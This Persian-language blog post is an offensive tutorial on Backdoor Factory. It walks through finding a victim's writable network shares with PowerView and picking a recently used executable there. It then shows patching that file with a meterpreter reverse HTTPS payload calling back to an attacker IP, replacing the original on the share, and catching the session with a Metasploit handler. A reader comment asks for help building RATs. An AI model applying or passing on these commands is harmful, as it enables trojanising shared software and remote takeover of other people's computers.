ابزار بکدور فکتوری Backdoor Factory

منتشر شده در دسته : راهکارهای هکر

ابزار بکدور فکتوری چه کاری انجام می دهد و هدف آن چیست ؟ هدف BDF این است که باینرهای اجرایی را با شلکود رویایی هکر پچ کند و یک اجرای پچ شده و عادی را ارایه کند . چگونه می‌توانید از این ویژگی بهره مند شوید ؟ کلید کار ثبات است .

ابزار بکدور فکتوری

ابتدا بایستی فایلی را پیدا کنیم تا شلکود خود را به آن اضافه کنیم . بهترین شیوه این کار چیست ؟
بازهم Harmj0y که اخیراً تحقیقات خوبی را ارایه کرده است . شما با این شیوه به دنبال اشتراک های باز موجود در سیستم می گردید .
طی تحقیقی که توسط Harmj0y انجام شده است شما درون اشتراک های باز سیستم هدف به دنبال بهترین فایل‌های ممکن جستجو می‌کنید تا آن‌ها را به یک بکدور تبدیل نمایید . حالا اگر بتوانیم سرور اشتراک فایل را جستجو کنیم تا آخرین فایل‌های استفاده شده را بیابیم ، به این شیوه می‌توان فهمید که این فایل‌ها توسط قربانی دایما مورد استفاده قرار گرفته و هدف خوبی برای بکدور هستند .

شما درون سیستم حمله ویندوزی خود دستورهای زیر را وارد کنید . تا اشتراک های باز سیستم هدف که سیستم ویندوزی دیگری درون شبکه هست را یپدا کنید :

powershell.exe -nop -exec bypass
Import-Module c:\scripts\powerview.ps1
Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | Out-File -Encoding ascii share_netamooz.txt
cat .\share_netamooz.txt

ابزار Backdoor Factory کالی لینوکس

توضیح دستورهای بالا :
خط فرمان را درون سیستم حمله ویندوزی خود باز کنید .
پاورشل را بدون محدودیت اجرای اسکریپت اجرا کنید .
اسکریپت powerview.ps1 را که از قبل دانلود کرده‌اید به ماژول های پاورشل اضافه کنید .
از کامندلت Invoke-ShareFinder استفاده کنید تا اشتراک های باز سیستمی را پیدا کنید و با استفاده از Out-File نتیجه را درون یک فایل متنی ذخیره کنید .
با دستور cat از حصول نتیجه آگاه شوید .

دستور اول همه اشتراک های باز سیستمی را برای ما پیدا کرد . دستور دومی که در زیر اجرا می‌کنیم نتایج ذخیره شده در فایل share_netamooz.txt را گرفته و همه فایل‌های اجرایی را سرشماری می‌کند و آخرین فایل‌های اجرایی که عمل خواندن یا نوشتن در آن‌ها رخ داده است را پیدا می‌کند . در زیر من یک فایل اجرایی ساده را به منظور اجرای تست درون سیستم قربانی چند بار اجرا کردم . شما نیز می‌توانید یک فایل کم حجم را درون سیستم ویندوزی و درون محیط اشتراکی قربانی اجرا کنید . دستور زیر را وارد کنید :

Invoke-FileFinder -ShareList .\share_netamooz.txt -FreshEXEs -ExcludeHidden -CheckWriteAccess

ابزار Backdoor Factory کالی لینوکس

ابزار Backdoor Factory کالی لینوکس

همانطور که از نتایج کار بر می‌آید می‌بینید که هر فایل اجرایی در چه تاریخی در سیستم قربانی مورد دسترسی قرار گرفته است . هدف ما در اینجا برنامه اجرای idserve.exe می‌باشد . این فایل را از سیستم قربانی و از روی بخش اشتراک های باز دانلود کنید و برای انجام مراحل بعدی کار به سیستم حمله کالی لینوکس منتقل کنید .
فایل idserve.exe را در محلی مشخص در کالی کپی کنید . من این فایل را در دسکتاپ قرار داده‌ام . اکنون بایستی ابزار بکدور فکتوری  را باز کنید . به این منظور دستور زیر را اجرا کنید که در حین اجرا بکدور را برای ما ایجاد کند :

./backdoor.py -f ~/Desktop/idserve.exe -s meterpreter_reverse_https_threaded -H 192.168.1.8 -P 8080

ابزار Backdoor Factory کالی لینوکس

در دستور بالا با سوییچ f- مسیر فایل مورد نظر برای ایجاد بکدور را تعیین می‌کنیم . با سوییچ s- نوع پیلود را تعیین کرده و با سوییچ H- آدرس آیپی سیستمی که قرار است بکدور با آن ارتباط برگشتی ایجاد کند یعنی همان سیستم کالی لینوکس شما را تعیین می‌کند و سوییچ P- پورت بازگشتی سیستم را تعیین می‌کند . پس از اجرای موفقیت آمیز یک کپی از فایل بکدور شما در پوشه Backdoored ذخیره می‌شود .

ابزار Backdoor Factory کالی لینوکس

ابزار Backdoor Factory کالی لینوکس

شما بایستی این فایل را کپی کنید و به جای فایل اجرایی موجود در مسیر اشتراکی سیستم قربانی قرار دهید تا با هر بار اجرای فایل بکدور توسط قربانی یک ارتباط برگشتی با سیستم شما ایجاد شود .

ولی ارتباط برگشتی چگونه برقرار شود ؟ توسط متااسپلیوییت . شما بایستی یک فایل rc ایجاد کنید تا با اجرای آن شنونده به صورت خودکار درون متااسپلیوییت ایجاد شود . به این منظور محتویات زیر را درون فایلی با پسوند rc ذخیره کنید :

use exploit/multi/handler
set LHOST 192.168.1.8
set LPORT 8080
set ExitOnSession false
exploit -j -z

ابزار Backdoor Factory کالی لینوکس

سپس توسط دستور زیر شنونده را اجرا کنید :

msfconsole -r myhandler.rc

ابزار Backdoor Factory کالی لینوکس

شنونده در پس زمینه اجرا می‌شود و منتظر ارتباط بازگشتی می‌نشیند :

ابزار Backdoor Factory کالی لینوکس

برای تست فایل بکدور را به صورت دستی در سیستم قربانی اجرا کنید :

ابزار Backdoor Factory کالی لینوکس

ملاحظه می‌کنید که ارتباط بازگشتی برقرار گشته و بکدور ما کار خواهد کرد و توانستیم با  ابزار بکدور فکتوری  به سیستم هدف برسیم .

ابزار Backdoor Factory کالی لینوکس

تعداد پیام ها 2

  1. سلام و خسته نباشید از سایت خیلی خوبتون ….
    من مشکلی در کالی لینوکس دارم که با ابزارهای
    Fatrat
    Backdoor
    Evil-droid
    و حتی msfvenom
    ارور یک سانی میدهند برای رات ساختن
    failed to recompile original project with backdoor
    لطفا تست و کمکم کنید هر جا گشتم این ارور زدم به جای نبردم

خوشحال می شویم دیدگاههای خود را در میان بگذارید * فرصت پاسخگویی به سوالات در بلاگ وجود ندارد

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *